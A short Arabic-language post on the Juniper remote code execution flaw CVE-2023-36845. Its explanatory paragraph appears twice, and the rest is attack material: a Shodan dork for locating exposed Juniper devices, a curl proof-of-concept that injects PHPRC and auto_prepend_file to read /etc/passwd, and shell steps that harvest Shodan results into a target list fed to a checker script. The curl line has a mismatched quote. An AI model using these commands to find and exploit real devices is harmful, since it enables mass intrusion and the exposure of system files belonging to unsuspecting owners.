
Juniper RCE (Remote Code Execution) CVE-2023-36845 هي ثغرة أمنية تم تحديدها في برمجيات Juniper. يسمح هذا الخلل المحدد بتنفيذ التعليمات البرمجية عن بُعد، مما يعني أن المهاجم يمكنه تشغيل تعليمات برمجية عشوائية على النظام دون الحاجة إلى وصول مادي إلى الجهاز.
Juniper RCE (Remote Code Execution) CVE-2023-36845 هي ثغرة أمنية تم تحديدها في برامج Juniper. يسمح هذا الخلل بتنفيذ التعليمات البرمجية عن بُعد، مما يعني أن المهاجم يمكنه تشغيل كود عشوائي على النظام دون الحاجة إلى وصول فعلي إلى الجهاز.
Shodan dork: http.favicon.hash:2141724739
استخدمها مع استعلامات بحث أخرى ذات صلة مثل شهادات SSL واسم المؤسسة وغيرها للحصول على بحث أكثر استهدافًا.
curl -k https://$IP/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'
└─# shodan download Juniper 'http.favicon.hash:2141724739 ssl:domain.com' #download from shodan
└─# shodan parse Juniper.json.gz --fields ip_str,port >unfiltered_IP_Ports.txt
└─# awk '{print $1":"$2}' unfiltered_IP_Ports.txt >juniper-final.txt
└─# ./Juniper-RCE-check.sh -f juniper-final.txt
